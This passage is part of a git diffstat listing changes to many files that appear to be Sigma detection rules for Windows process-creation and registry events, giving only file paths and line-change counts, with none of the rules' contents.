...ion_win_powershell_shadowcopy_deletion.yml | 18 +- ...reation_win_powershell_snapins_hafnium.yml | 23 +- ...c_creation_win_powershell_stop_service.yml | 21 +- ...on_win_powershell_susp_child_processes.yml | 10 +- ..._win_powershell_susp_download_patterns.yml | 10 +- ...in_powershell_susp_parameter_variation.yml | 7 +- ...ion_win_powershell_susp_parent_process.yml | 76 +- ...reation_win_powershell_susp_ps_appdata.yml | 9 +- ...on_win_powershell_susp_ps_downloadfile.yml | 5 +- ...ll_tamper_defender_remove_mppreference.yml | 11 +- ...ation_win_powershell_token_obfuscation.yml | 16 +- ...n_powershell_user_discovery_get_aduser.yml | 26 +- ...eation_win_powershell_webclient_casing.yml | 18 +- ...creation_win_powershell_x509enrollment.yml | 6 +- ...reation_win_powershell_xor_commandline.yml | 27 +- 
...c_creation_win_powershell_zip_compress.yml | 28 +- ...creation_win_presentationhost_download.yml | 9 +- ...resentationhost_uncommon_location_exec.yml | 15 +- ...ation_win_pressanykey_lolbin_execution.yml | 10 +- ...oc_creation_win_print_remote_file_copy.yml | 8 +- ..._creation_win_protocolhandler_download.yml | 12 +- ...reation_win_provlaunch_potential_abuse.yml | 54 +- ...tion_win_provlaunch_susp_child_process.yml | 53 +- ...c_creation_win_psr_capture_screenshots.yml | 7 +- ...proc_creation_win_pua_3proxy_execution.yml | 6 +- ...oc_creation_win_pua_adfind_enumeration.yml | 19 +- ...roc_creation_win_pua_adfind_susp_usage.yml | 13 +- ...c_creation_win_pua_advanced_ip_scanner.yml | 11 +- ...creation_win_pua_advanced_port_scanner.yml | 8 +- ...creation_win_pua_advancedrun_priv_user.yml | 29 +- .../proc_creation_win_pua_chisel.yml | 10 +- .../proc_creation_win_pua_cleanwipe.yml | 14 +- .../proc_creation_win_pua_crassus.yml | 9 +- .../proc_creation_win_pua_csexec.yml | 5 +- .../proc_creation_win_pua_defendercheck.yml | 8 +- .../proc_creation_win_pua_ditsnap.yml | 7 +- .../proc_creation_win_pua_frp.yml | 22 +- .../proc_creation_win_pua_iox.yml | 22 +- .../proc_creation_win_pua_netcat.yml | 11 +- .../proc_creation_win_pua_ngrok.yml | 17 +- .../proc_creation_win_pua_nimgrab.yml | 11 +- .../proc_creation_win_pua_nircmd.yml | 13 +- ...proc_creation_win_pua_nircmd_as_system.yml | 2 +- .../proc_creation_win_pua_nmap_zenmap.yml | 16 +- .../proc_creation_win_pua_nps.yml | 24 +- .../proc_creation_win_pua_nsudo.yml | 32 +- .../proc_creation_win_pua_pingcastle.yml | 317 +- ...ation_win_pua_pingcastle_script_parent.yml | 86 +- .../proc_creation_win_pua_process_hacker.yml | 56 +- ...proc_creation_win_pua_rcedit_execution.yml | 21 +- ...proc_creation_win_pua_rclone_execution.yml | 19 +- .../proc_creation_win_pua_runxcmd.yml | 7 +- .../proc_creation_win_pua_seatbelt.yml | 44 +- .../proc_creation_win_pua_system_informer.yml | 28 +- ...oc_creation_win_pua_webbrowserpassview.yml | 9 +- 
..._creation_win_pua_wsudo_susp_execution.yml | 14 +- .../proc_creation_win_python_adidnsdump.yml | 11 +- ...on_win_python_inline_command_execution.yml | 20 +- .../proc_creation_win_python_pty_spawn.yml | 12 +- .../proc_creation_win_query_session_exfil.yml | 7 +- .../proc_creation_win_rar_compress_data.yml | 9 +- ...tion_win_rar_compression_with_password.yml | 8 +- ...eation_win_rar_susp_greedy_compression.yml | 18 +- .../proc_creation_win_rasdial_execution.yml | 5 +- ...eation_win_rdrleakdiag_process_dumping.yml | 23 +- .../proc_creation_win_reg_add_run_key.yml | 8 +- .../proc_creation_win_reg_add_safeboot.yml | 16 +- .../proc_creation_win_reg_bitlocker.yml | 7 +- ..._credential_access_via_password_filter.yml | 5 +- ...oc_creation_win_reg_defender_exclusion.yml | 10 +- .../proc_creation_win_reg_delete_safeboot.yml | 14 +- .../proc_creation_win_reg_delete_services.yml | 12 +- ...tion_win_reg_desktop_background_change.yml | 39 +- ...direct_asep_registry_keys_modification.yml | 14 +- ..._creation_win_reg_disable_sec_services.yml | 9 +- ...eation_win_reg_dumping_sensitive_hives.yml | 46 +- ...numeration_for_credentials_in_registry.yml | 32 +- ...n_win_reg_import_from_suspicious_paths.yml | 15 +- ...n_win_reg_lsa_disable_restricted_admin.yml | 20 +- ...on_win_reg_lsa_ppl_protection_disabled.yml | 11 +- .../proc_creation_win_reg_machineguid.yml | 4 +- ...n_win_reg_modify_group_policy_settings.yml | 15 +- .../proc_creation_win_reg_nolmhash.yml | 16 +- .../proc_creation_win_reg_open_command.yml | 9 +- .../proc_creation_win_reg_query_registry.yml | 14 +- .../proc_creation_win_reg_rdp_keys_tamper.yml | 14 +- .../proc_creation_win_reg_screensaver.yml | 30 +- ...ation_win_reg_service_imagepath_change.yml | 18 +- ...oc_creation_win_reg_software_discovery.yml | 14 +- .../proc_creation_win_reg_susp_paths.yml | 10 +- .../proc_creation_win_reg_volsnap_disable.yml | 2 +- ...eation_win_reg_windows_defender_tamper.yml | 21 +- ...reg_write_protect_for_storage_disabled.yml | 8 +- 
...m_regsvcs_uncommon_extension_execution.yml | 22 +- ...sm_regsvcs_uncommon_location_execution.yml | 24 +- ...ation_win_regedit_export_critical_keys.yml | 14 +- .../proc_creation_win_regedit_export_keys.yml | 16 +- .../proc_creation_win_regedit_import_keys.yml | 14 +- ...c_creation_win_regedit_import_keys_ads.yml | 14 +- ..._creation_win_regedit_trustedinstaller.yml | 2 +- .../proc_creation_win_regini_ads.yml | 13 +- .../proc_creation_win_regini_execution.yml | 13 +- ...tion_win_registry_cimprovider_dll_load.yml | 4 +- ...gistry_enumeration_for_credentials_cli.yml | 9 +- ...urity_zone_protocol_defaults_downgrade.yml | 14 +- ...registry_install_reg_debugger_backdoor.yml | 7 +- ...roc_creation_win_registry_logon_script.yml | 12 +- ...tion_win_registry_new_network_provider.yml | 15 +- ...y_privilege_escalation_via_service_key.yml | 7 +- ...gistry_provlaunch_provisioning_command.yml | 17 +- ...egistry_set_unsecure_powershell_policy.yml | 19 +- ...n_win_registry_typed_paths_persistence.yml | 5 +- ...oc_creation_win_regsvr32_flags_anomaly.yml | 9 +- ..._creation_win_regsvr32_http_ip_pattern.yml | 9 +- ..._creation_win_regsvr32_network_pattern.yml | 15 +- ...roc_creation_win_regsvr32_remote_share.yml | 7 +- ...eation_win_regsvr32_susp_child_process.yml | 10 +- ...creation_win_regsvr32_susp_exec_path_1.yml | 16 +- ...creation_win_regsvr32_susp_exec_path_2.yml | 27 +- ..._creation_win_regsvr32_susp_extensions.yml | 15 +- ...proc_creation_win_regsvr32_susp_parent.yml | 16 +- ...eation_win_regsvr32_uncommon_extension.yml | 26 +- ...eation_win_remote_access_tools_anydesk.yml | 28 +- ...s_tools_anydesk_piped_password_via_cli.yml | 6 +- ...te_access_tools_anydesk_silent_install.yml | 7 +- ..._remote_access_tools_anydesk_susp_exec.yml | 30 +- ...mote_access_tools_netsupport_susp_exec.yml | 15 +- ...ccess_tools_rurat_non_default_location.yml | 13 +- ...mote_access_tools_screenconnect_access.yml | 5 +- ...ote_access_tools_screenconnect_anomaly.yml | 5 +- 
...access_tools_screenconnect_remote_exec.yml | 11 +- ...roc_creation_win_remote_time_discovery.yml | 15 +- .../proc_creation_win_renamed_adfind.yml | 20 +- .../proc_creation_win_renamed_autoit.yml | 33 +- .../proc_creation_win_renamed_browsercore.yml | 5 +- .../proc_creation_win_renamed_cloudflared.yml | 12 +- .../proc_creation_win_renamed_createdump.yml | 25 +- .../proc_creation_win_renamed_curl.yml | 9 +- .../proc_creation_win_renamed_gpg4win.yml | 5 +- ...oc_creation_win_renamed_netsupport_rat.yml | 13 +- ..._creation_win_renamed_office_processes.yml | 38 +- .../proc_creation_win_renamed_paexec.yml | 40 +- .../proc_creation_win_renamed_pingcastle.yml | 61 +- .../proc_creation_win_renamed_pressanykey.yml | 9 +- ...win_renamed_rundll32_dllregisterserver.yml | 12 +- ...tion_win_renamed_sysinternals_procdump.yml | 16 +- .../proc_creation_win_renamed_vmnat.yml | 5 +- ...reation_win_rpcping_credential_capture.yml | 31 +- ...tion_win_ruby_inline_command_execution.yml | 9 +- ..._win_rundll32_ads_stored_dll_execution.yml | 12 +- ...ndll32_advpack_obfuscated_ordinal_call.yml | 19 +- .../proc_creation_win_rundll32_by_ordinal.yml | 17 +- .../proc_creation_win_rundll32_inline_vbs.yml | 5 +- ...eation_win_rundll32_installscreensaver.yml | 9 +- ...ion_win_rundll32_js_runhtmlapplication.yml | 7 +- .../proc_creation_win_rundll32_keymgr.yml | 9 +- ...win_rundll32_mshtml_runhtmlapplication.yml | 10 +- .../proc_creation_win_rundll32_no_params.yml | 5 +- .../proc_creation_win_rundll32_ntlmrelay.yml | 11 +- ...n_win_rundll32_obfuscated_ordinal_call.yml | 8 +- ..._creation_win_rundll32_parent_explorer.yml | 12 +- ..._win_rundll32_process_dump_via_comsvcs.yml | 23 +- ...on_win_rundll32_registered_com_objects.yml | 8 +- ...oc_creation_win_rundll32_run_locations.yml | 27 +- .../proc_creation_win_rundll32_script_run.yml | 9 +- ...on_win_rundll32_shell32_susp_execution.yml | 8 +- ...rundll32_shelldispatch_potential_abuse.yml | 9 +- ...oc_creation_win_rundll32_susp_activity.yml | 162 +- 
...ion_win_rundll32_susp_control_dll_load.yml | 9 +- ...32_susp_execution_with_image_extension.yml | 13 +- ..._win_rundll32_susp_shellexec_execution.yml | 12 +- ...tion_win_rundll32_susp_shimcache_flush.yml | 11 +- .../proc_creation_win_rundll32_sys.yml | 7 +- .../proc_creation_win_rundll32_unc_path.yml | 11 +- ...on_win_rundll32_uncommon_dll_extension.yml | 17 +- .../proc_creation_win_rundll32_user32_dll.yml | 14 +- ...n_win_rundll32_webdav_client_execution.yml | 16 +- ..._rundll32_webdav_client_susp_execution.yml | 26 +- ...eation_win_rundll32_without_parameters.yml | 5 +- .../proc_creation_win_runonce_execution.yml | 11 +- ..._change_sevice_image_path_by_non_admin.yml | 9 +- .../proc_creation_win_sc_create_service.yml | 8 +- .../proc_creation_win_sc_disable_service.yml | 11 +- ...proc_creation_win_sc_new_kernel_driver.yml | 6 +- .../proc_creation_win_sc_query.yml | 13 +- ...ion_win_sc_sdset_allow_service_changes.yml | 28 +- ...ation_win_sc_sdset_deny_service_access.yml | 31 +- ...roc_creation_win_sc_sdset_hide_sevices.yml | 23 +- ...roc_creation_win_sc_sdset_modification.yml | 17 +- ...ation_win_sc_service_path_modification.yml | 11 +- ..._win_sc_service_tamper_for_persistence.yml | 38 +- .../proc_creation_win_sc_stop_service.yml | 21 +- ...tion_win_schtasks_appdata_local_system.yml | 15 +- .../proc_creation_win_schtasks_change.yml | 23 +- .../proc_creation_win_schtasks_creation.yml | 6 +- ...tion_win_schtasks_creation_temp_folder.yml | 7 +- .../proc_creation_win_schtasks_delete.yml | 18 +- .../proc_creation_win_schtasks_delete_all.yml | 8 +- .../proc_creation_win_schtasks_disable.yml | 14 +- .../proc_creation_win_schtasks_env_folder.yml | 42 +- ...oc_creation_win_schtasks_folder_combos.yml | 13 +- ...c_creation_win_schtasks_guid_task_name.yml | 12 +- ...n_schtasks_one_time_only_midnight_task.yml | 11 +- .../proc_creation_win_schtasks_parent.yml | 12 +- ...schtasks_persistence_windows_telemetry.yml | 20 +- .../proc_creation_win_schtasks_reg_loader.yml | 22 +- 
...eation_win_schtasks_reg_loader_encoded.yml | 21 +- ...oc_creation_win_schtasks_schedule_type.yml | 19 +- ...tion_win_schtasks_schedule_type_system.yml | 22 +- ...asks_schedule_via_masqueraded_xml_file.yml | 18 +- ...roc_creation_win_schtasks_susp_pattern.yml | 25 +- .../proc_creation_win_schtasks_system.yml | 26 +- ...reation_win_scrcons_susp_child_process.yml | 2 +- ..._creation_win_sdbinst_shim_persistence.yml | 22 +- ...oc_creation_win_sdbinst_susp_extension.yml | 37 +- .../proc_creation_win_sdclt_child_process.yml | 3 +- ...roc_creation_win_sdiagnhost_susp_child.yml | 9 +- .../proc_creation_win_secedit_execution.yml | 13 +- ..._creation_win_servu_susp_child_process.yml | 10 +- ...oc_creation_win_setspn_spn_enumeration.yml | 12 +- .../proc_creation_win_shutdown_execution.yml | 4 +- .../proc_creation_win_shutdown_logoff.yml | 4 +- ...eation_win_sndvol_susp_child_processes.yml | 7 +- ...eation_win_soundrecorder_audio_capture.yml | 4 +- ...proc_creation_win_splwow64_cli_anomaly.yml | 4 +- ...ation_win_spoolsv_susp_child_processes.yml | 29 +- ...roc_creation_win_sqlcmd_veeam_db_recon.yml | 9 +- .../proc_creation_win_sqlcmd_veeam_dump.yml | 4 +- ...ation_win_sqlite_chromium_profile_data.yml | 25 +- ..._win_sqlite_firefox_gecko_profile_data.yml | 15 +- .../proc_creation_win_squirrel_download.yml | 27 +- ..._creation_win_squirrel_proxy_execution.yml | 39 +- .../proc_creation_win_ssh_port_forward.yml | 4 +- .../proc_creation_win_ssh_rdp_tunneling.yml | 11 +- .../proc_creation_win_ssm_agent_abuse.yml | 7 +- ...eation_win_stordiag_susp_child_process.yml | 7 +- ...oc_creation_win_susp_16bit_application.yml | 6 +- ...ation_win_susp_abusing_debug_privilege.yml | 20 +- ...on_win_susp_add_user_local_admin_group.yml | 25 +- ...win_susp_add_user_remote_desktop_group.yml | 25 +- ...eation_win_susp_alternate_data_streams.yml | 15 +- ...ays_install_elevated_windows_installer.yml | 18 +- .../proc_creation_win_susp_appx_execution.yml | 16 +- 
...ary_shell_execution_via_settingcontent.yml | 8 +- ...reation_win_susp_archiver_iso_phishing.yml | 10 +- ...creation_win_susp_automated_collection.yml | 9 +- ...n_susp_bad_opsec_sacrificial_processes.yml | 49 +- ...tion_win_susp_child_process_as_system_.yml | 18 +- ...n_win_susp_cli_obfuscation_escape_char.yml | 7 +- ...ation_win_susp_cli_obfuscation_unicode.yml | 54 +- ...usp_commandline_path_traversal_evasion.yml | 13 +- ...oc_creation_win_susp_copy_browser_data.yml | 50 +- ...reation_win_susp_copy_lateral_movement.yml | 43 +- ...proc_creation_win_susp_copy_system_dir.yml | 45 +- ...eation_win_susp_copy_system_dir_lolbin.yml | 36 +- ...creation_win_susp_crypto_mining_monero.yml | 6 +- ...ion_win_susp_data_exfiltration_via_cli.yml | 63 +- ...proc_creation_win_susp_disable_raccine.yml | 9 +- ...roc_creation_win_susp_double_extension.yml | 15 +- ...ation_win_susp_double_extension_parent.yml | 80 +- ...eation_win_susp_download_office_domain.yml | 30 +- ...reation_win_susp_dumpstack_log_evasion.yml | 4 +- ...on_win_susp_elavated_msi_spawned_shell.yml | 16 +- ...reation_win_susp_electron_app_children.yml | 48 +- ...tion_win_susp_electron_exeuction_proxy.yml | 61 +- ..._elevated_system_shell_uncommon_parent.yml | 46 +- .../proc_creation_win_susp_embed_exe_lnk.yml | 7 +- ...tion_win_susp_etw_modification_cmdline.yml | 6 +- ...oc_creation_win_susp_etw_trace_evasion.yml | 23 +- .../proc_creation_win_susp_eventlog_clear.yml | 31 +- ...eation_win_susp_eventlog_content_recon.yml | 44 +- ..._susp_execution_from_guid_folder_names.yml | 25 +- ...execution_from_public_folder_as_parent.yml | 5 +- .../proc_creation_win_susp_execution_path.yml | 46 +- ...tion_win_susp_execution_path_webserver.yml | 7 +- ...win_susp_gather_network_info_execution.yml | 15 +- ...n_win_susp_hidden_dir_index_allocation.yml | 14 +- ...in_susp_hiding_malware_in_fonts_folder.yml | 10 +- ...win_susp_homoglyph_cyrillic_lookalikes.yml | 118 +- .../proc_creation_win_susp_image_missing.yml | 28 +- 
...ation_win_susp_inline_base64_mz_header.yml | 4 +- ...reation_win_susp_inline_win_api_access.yml | 15 +- ...p_local_system_owner_account_discovery.yml | 43 +- ..._win_susp_lolbin_exec_from_non_c_drive.yml | 53 +- ...eation_win_susp_lsass_dmp_cli_keywords.yml | 52 +- ...tion_win_susp_ms_appinstaller_download.yml | 13 +- ...proc_creation_win_susp_network_command.yml | 5 +- ...oc_creation_win_susp_network_scan_loop.yml | 8 +- ...roc_creation_win_susp_network_sniffing.yml | 21 +- .../proc_creation_win_susp_non_exe_image.yml | 58 +- ...c_creation_win_susp_non_priv_reg_or_ps.yml | 11 +- .../proc_creation_win_susp_ntds.yml | 57 +- ...creation_win_susp_nteventlogfile_usage.yml | 11 +- ..._win_susp_ntfs_short_name_path_use_cli.yml | 42 +- ...in_susp_ntfs_short_name_path_use_image.yml | 42 +- ...ation_win_susp_ntfs_short_name_use_cli.yml | 20 +- ...ion_win_susp_ntfs_short_name_use_image.yml | 16 +- ...eation_win_susp_obfuscated_ip_download.yml | 32 +- ...reation_win_susp_obfuscated_ip_via_cli.yml | 32 +- ..._creation_win_susp_office_token_search.yml | 10 +- .../proc_creation_win_susp_parents.yml | 17 +- ...in_susp_priv_escalation_via_named_pipe.yml | 21 +- ...c_creation_win_susp_private_keys_recon.yml | 32 +- ...susp_privilege_escalation_cli_patterns.yml | 9 +- ...oc_creation_win_susp_proc_wrong_parent.yml | 18 +- .../proc_creation_win_susp_progname.yml | 31 +- .../proc_creation_win_susp_recon.yml | 25 +- ...on_win_susp_recycle_bin_fake_execution.yml | 10 +- ...on_win_susp_redirect_local_admin_share.yml | 7 +- ...tion_win_susp_remote_desktop_tunneling.yml | 8 +- ...eation_win_susp_right_to_left_override.yml | 12 +- ...n_win_susp_script_exec_from_env_folder.yml | 27 +- ...reation_win_susp_script_exec_from_temp.yml | 10 +- ...roc_creation_win_susp_service_creation.yml | 17 +- .../proc_creation_win_susp_service_dir.yml | 2 +- .../proc_creation_win_susp_service_tamper.yml | 69 +- ...eation_win_susp_shadow_copies_creation.yml | 25 +- 
...eation_win_susp_shadow_copies_deletion.yml | 53 +- ...tion_win_susp_shell_spawn_susp_program.yml | 15 +- .../proc_creation_win_susp_sysnative.yml | 7 +- ...c_creation_win_susp_system_exe_anomaly.yml | 29 +- ..._creation_win_susp_system_user_anomaly.yml | 110 +- .../proc_creation_win_susp_sysvol_access.yml | 2 +- ..._creation_win_susp_task_folder_evasion.yml | 17 +- .../proc_creation_win_susp_use_of_te_bin.yml | 17 +- ...tion_win_susp_use_of_vsjitdebugger_bin.yml | 17 +- .../proc_creation_win_susp_userinit_child.yml | 6 +- ...tion_win_susp_weak_or_abused_passwords.yml | 9 +- ...n_win_susp_web_request_cmd_and_cmdlets.yml | 20 +- ...proc_creation_win_susp_whoami_as_param.yml | 5 +- .../proc_creation_win_susp_workfolders.yml | 4 +- ...in_svchost_execution_with_no_cli_flags.yml | 16 +- ...eation_win_svchost_termserv_proc_spawn.yml | 7 +- ...on_win_svchost_uncommon_parent_process.yml | 4 +- ...sinternals_accesschk_check_permissions.yml | 21 +- ..._win_sysinternals_adexplorer_execution.yml | 13 +- ...sysinternals_adexplorer_susp_execution.yml | 17 +- ...reation_win_sysinternals_eula_accepted.yml | 9 +- ...tion_win_sysinternals_livekd_execution.yml | 8 +- ...sysinternals_livekd_kernel_memory_dump.yml | 13 +- ...roc_creation_win_sysinternals_procdump.yml | 2 +- ...tion_win_sysinternals_procdump_evasion.yml | 18 +- ...eation_win_sysinternals_procdump_lsass.yml | 14 +- ...tion_win_sysinternals_psexec_execution.yml | 4 +- ...nternals_psexec_paexec_escalate_system.yml | 25 +- ...n_sysinternals_psexec_remote_execution.yml | 6 +- ...roc_creation_win_sysinternals_psexesvc.yml | 11 +- ...on_win_sysinternals_psexesvc_as_system.yml | 14 +- ...oc_creation_win_sysinternals_psloglist.yml | 19 +- ...oc_creation_win_sysinternals_psservice.yml | 11 +- ...n_win_sysinternals_pssuspend_execution.yml | 15 +- ..._sysinternals_pssuspend_susp_execution.yml | 18 +- ..._sysinternals_susp_psexec_paexec_flags.yml | 22 +- ..._win_sysinternals_sysmon_config_update.yml | 14 +- 
...tion_win_sysinternals_sysmon_uninstall.yml | 16 +- ...on_win_sysinternals_tools_masquerading.yml | 7 +- .../proc_creation_win_sysprep_appdata.yml | 10 +- ...proc_creation_win_systeminfo_execution.yml | 4 +- ...ettingsadminflows_turn_on_dev_features.yml | 15 +- ...roc_creation_win_takeown_recursive_own.yml | 7 +- ...proc_creation_win_tapinstall_execution.yml | 11 +- .../proc_creation_win_tar_compression.yml | 12 +- .../proc_creation_win_tar_extraction.yml | 12 +- .../proc_creation_win_taskkill_sep.yml | 17 +- ..._creation_win_tasklist_basic_execution.yml | 10 +- .../proc_creation_win_taskmgr_localsystem.yml | 4 +- ...reation_win_taskmgr_susp_child_process.yml | 2 +- ...ms_suspicious_command_line_cred_access.yml | 14 +- ...on_win_tpmvscmgr_add_virtual_smartcard.yml | 4 +- .../proc_creation_win_tscon_localsystem.yml | 4 +- .../proc_creation_win_tscon_rdp_redirect.yml | 2 +- ...eation_win_tscon_rdp_session_hijacking.yml | 4 +- ..._creation_win_uac_bypass_changepk_slui.yml | 2 +- .../proc_creation_win_uac_bypass_cmstp.yml | 9 +- ...eation_win_uac_bypass_computerdefaults.yml | 5 +- ...eation_win_uac_bypass_consent_comctl32.yml | 5 +- .../proc_creation_win_uac_bypass_dismhost.yml | 3 +- ...on_win_uac_bypass_eventvwr_recentviews.yml | 9 +- ...proc_creation_win_uac_bypass_fodhelper.yml | 3 +- .../proc_creation_win_uac_bypass_ieinstal.yml | 4 +- ...c_creation_win_uac_bypass_msconfig_gui.yml | 2 +- ...tion_win_uac_bypass_ntfs_reparse_point.yml | 14 +- ...oc_creation_win_uac_bypass_pkgmgr_dism.yml | 5 +- .../proc_creation_win_uac_bypass_sdclt.yml | 5 +- ...oc_creation_win_uac_bypass_trustedpath.yml | 2 +- .../proc_creation_win_uac_bypass_wmp.yml | 10 +- .../proc_creation_win_uac_bypass_wsreset.yml | 14 +- ...win_uac_bypass_wsreset_integrity_level.yml | 2 +- ...c_creation_win_ultravnc_susp_execution.yml | 6 +- ...ation_win_uninstall_crowdstrike_falcon.yml | 8 +- ..._win_userinit_uncommon_child_processes.yml | 36 +- .../proc_creation_win_vaultcmd_list_creds.yml | 9 +- 
.../proc_creation_win_verclsid_runs_com.yml | 6 +- ...proc_creation_win_virtualbox_execution.yml | 11 +- ...n_win_virtualbox_vboxdrvinst_execution.yml | 17 +- ...ion_win_vmware_toolbox_cmd_persistence.yml | 13 +- ...in_vmware_toolbox_cmd_persistence_susp.yml | 16 +- ...win_vmware_vmtoolsd_susp_child_process.yml | 51 +- ...n_win_vscode_child_processes_anomalies.yml | 17 +- ...c_creation_win_vscode_tunnel_execution.yml | 13 +- ...eation_win_vscode_tunnel_remote_shell_.yml | 13 +- ...on_win_vscode_tunnel_renamed_execution.yml | 20 +- ...tion_win_vscode_tunnel_service_install.yml | 2 +- ...tion_win_vsdiagnostics_execution_proxy.yml | 11 +- ..._win_vslsagent_agentextensionpath_load.yml | 9 +- .../proc_creation_win_w32tm.yml | 9 +- ...ab_execution_from_non_default_location.yml | 7 +- .../proc_creation_win_wab_unusual_parents.yml | 12 +- ...n_win_wbadmin_delete_systemstatebackup.yml | 13 +- ...proc_creation_win_webdav_lnk_execution.yml | 8 +- .../proc_creation_win_webshell_chopper.yml | 9 +- .../proc_creation_win_webshell_hacking.yml | 55 +- ..._webshell_recon_commands_and_processes.yml | 87 +- ...ll_susp_process_spawned_from_webserver.yml | 21 +- .../proc_creation_win_webshell_tool_recon.yml | 11 +- ...reation_win_werfault_lsass_shtinkering.yml | 18 +- ...ion_win_werfault_reflect_debugger_exec.yml | 14 +- ...creation_win_wermgr_susp_child_process.yml | 9 +- ...creation_win_wermgr_susp_exec_location.yml | 11 +- ...c_creation_win_wget_download_direct_ip.yml | 17 +- ...get_download_susp_file_sharing_domains.yml | 19 +- ..._creation_win_where_browser_data_recon.yml | 22 +- ...proc_creation_win_whoami_all_execution.yml | 6 +- .../proc_creation_win_whoami_execution.yml | 7 +- ...hoami_execution_from_high_priv_process.yml | 11 +- ...c_creation_win_whoami_groups_discovery.yml | 10 +- .../proc_creation_win_whoami_output.yml | 12 +- ...roc_creation_win_whoami_parent_anomaly.yml | 10 +- ...roc_creation_win_whoami_priv_discovery.yml | 10 +- 
...ion_win_windows_terminal_susp_children.yml | 58 +- ..._creation_win_winget_add_custom_source.yml | 14 +- ..._win_winget_add_insecure_custom_source.yml | 23 +- ...tion_win_winget_add_susp_custom_source.yml | 17 +- ..._win_winget_local_install_via_manifest.yml | 24 +- ...oc_creation_win_winrar_exfil_dmp_files.yml | 20 +- ...creation_win_winrar_susp_child_process.yml | 41 +- ...n_win_winrar_uncommon_folder_execution.yml | 22 +- .../proc_creation_win_winrm_awl_bypass.yml | 12 +- ..._execution_via_scripting_api_winrm_vbs.yml | 10 +- ...inrm_remote_powershell_session_process.yml | 8 +- ..._creation_win_winrm_susp_child_process.yml | 5 +- ...eation_win_winzip_password_compression.yml | 9 +- ..._wmi_backdoor_exchange_transport_agent.yml | 8 +- ..._wmi_persistence_script_event_consumer.yml | 6 +- ...eation_win_wmic_eventconsumer_creation.yml | 5 +- ...c_creation_win_wmic_namespace_defender.yml | 9 +- ...roc_creation_win_wmic_process_creation.yml | 13 +- ...creation_win_wmic_recon_computersystem.yml | 9 +- ...proc_creation_win_wmic_recon_csproduct.yml | 9 +- .../proc_creation_win_wmic_recon_group.yml | 20 +- .../proc_creation_win_wmic_recon_hotfix.yml | 10 +- .../proc_creation_win_wmic_recon_process.yml | 13 +- .../proc_creation_win_wmic_recon_product.yml | 9 +- ..._creation_win_wmic_recon_product_class.yml | 9 +- .../proc_creation_win_wmic_recon_service.yml | 28 +- ...on_win_wmic_recon_system_info_uncommon.yml | 24 +- ...win_wmic_recon_unquoted_service_search.yml | 17 +- ...roc_creation_win_wmic_remote_execution.yml | 16 +- ...creation_win_wmic_service_manipulation.yml | 8 +- ...oc_creation_win_wmic_squiblytwo_bypass.yml | 27 +- ...wmic_susp_execution_via_office_process.yml | 32 +- ...reation_win_wmic_susp_process_creation.yml | 12 +- ...reation_win_wmic_terminate_application.yml | 13 +- ...reation_win_wmic_uninstall_application.yml | 10 +- ...n_win_wmic_uninstall_security_products.yml | 17 +- ...reation_win_wmic_xsl_script_processing.yml | 27 +- 
...creation_win_wmiprvse_spawning_process.yml | 22 +- ...reation_win_wmiprvse_spawns_powershell.yml | 23 +- ...tion_win_wmiprvse_susp_child_processes.yml | 31 +- ...ation_win_wpbbin_potential_persistence.yml | 8 +- ...eation_win_wscript_cscript_script_exec.yml | 24 +- ...n_wscript_cscript_susp_child_processes.yml | 31 +- ...script_cscript_uncommon_extension_exec.yml | 19 +- ...tion_win_wsl_child_processes_anomalies.yml | 13 +- ...proc_creation_win_wsl_lolbin_execution.yml | 28 +- .../proc_creation_win_wuauclt_dll_loading.yml | 30 +- ...ion_win_wuauclt_no_cli_flags_execution.yml | 12 +- ...creation_win_wusa_cab_files_extraction.yml | 11 +- ...a_cab_files_extraction_from_susp_paths.yml | 11 +- ...reation_win_wusa_susp_parent_execution.yml | 32 +- .../registry_add_malware_netwire.yml | 2 +- .../registry_add_malware_ursnif.yml | 2 +- ...egistry_add_persistence_amsi_providers.yml | 8 +- ...gistry_add_persistence_com_key_linking.yml | 4 +- ...persistence_disk_cleanup_handler_entry.yml | 20 +- ...e_logon_scripts_userinitmprlogonscript.yml | 8 +- ...dd_pua_sysinternals_execution_via_eula.yml | 5 +- ...ysinternals_renamed_execution_via_eula.yml | 15 +- ...a_sysinternals_susp_execution_via_eula.yml | 17 +- .../registry_event_apt_oilrig_mar18.yml | 18 +- .../registry_event_bypass_via_wsreset.yml | 4 +- ...stry_event_cmstp_execution_by_registry.yml | 3 +- ...y_events_logging_adding_reg_key_minint.yml | 10 +- ...event_disable_wdigest_credential_guard.yml | 11 +- ...entutl_volume_shadow_copy_service_keys.yml | 4 +- ...t_hybridconnectionmgr_svc_installation.yml | 5 +- .../registry_event_mal_flowcloud.yml | 10 +- ...registry_event_malware_qakbot_registry.yml | 3 +- ...gistry_event_mimikatz_printernightmare.yml | 9 +- ...y_event_modify_screensaver_binary_path.yml | 3 +- ...ry_event_narrator_feedback_persistance.yml | 2 +- ..._dll_added_to_appcertdlls_registry_key.yml | 16 +- ...dll_added_to_appinit_dlls_registry_key.yml | 16 +- .../registry_event_office_test_regadd.yml | 3 +- 
...event_office_trust_record_modification.yml | 7 +- ...registry_event_persistence_recycle_bin.yml | 4 +- .../registry_event_portproxy_registry_key.yml | 3 +- .../registry_event_runkey_winekey.yml | 6 +- .../registry_event_runonce_persistence.yml | 12 +- ...try_event_shell_open_keys_manipulation.yml | 11 +- ...registry_event_silentprocessexit_lsass.yml | 7 +- .../registry_event_ssp_added_lsa_config.yml | 6 +- ...registry_event_stickykey_like_backdoor.yml | 4 +- .../registry_event_susp_atbroker_change.yml | 3 +- .../registry_event_susp_download_run_key.yml | 3 +- .../registry_event_susp_lsass_dll_load.yml | 3 +- .../registry_event_susp_mic_cam_access.yml | 6 +- ...gistry_set_enable_anonymous_connection.yml | 3 +- ...stry_set_add_load_service_in_safe_mode.yml | 3 +- .../registry_set_add_port_monitor.yml | 15 +- .../registry_set_aedebug_persistence.yml | 7 +- ...et_allow_rdp_remote_assistance_feature.yml | 3 +- .../registry_set_amsi_com_hijack.yml | 6 +- ...set_asep_reg_keys_modification_classes.yml | 12 +- ..._set_asep_reg_keys_modification_common.yml | 32 +- ...eg_keys_modification_currentcontrolset.yml | 14 +- ...p_reg_keys_modification_currentversion.yml | 45 +- ...eg_keys_modification_currentversion_nt.yml | 32 +- ...eg_keys_modification_internet_explorer.yml | 12 +- ..._set_asep_reg_keys_modification_office.yml | 12 +- ..._reg_keys_modification_session_manager.yml | 15 +- ...p_reg_keys_modification_system_scripts.yml | 12 +- ...et_asep_reg_keys_modification_winsock2.yml | 21 +- ...asep_reg_keys_modification_wow6432node.yml | 32 +- ..._keys_modification_wow6432node_classes.yml | 12 +- ...odification_wow6432node_currentversion.yml | 18 +- 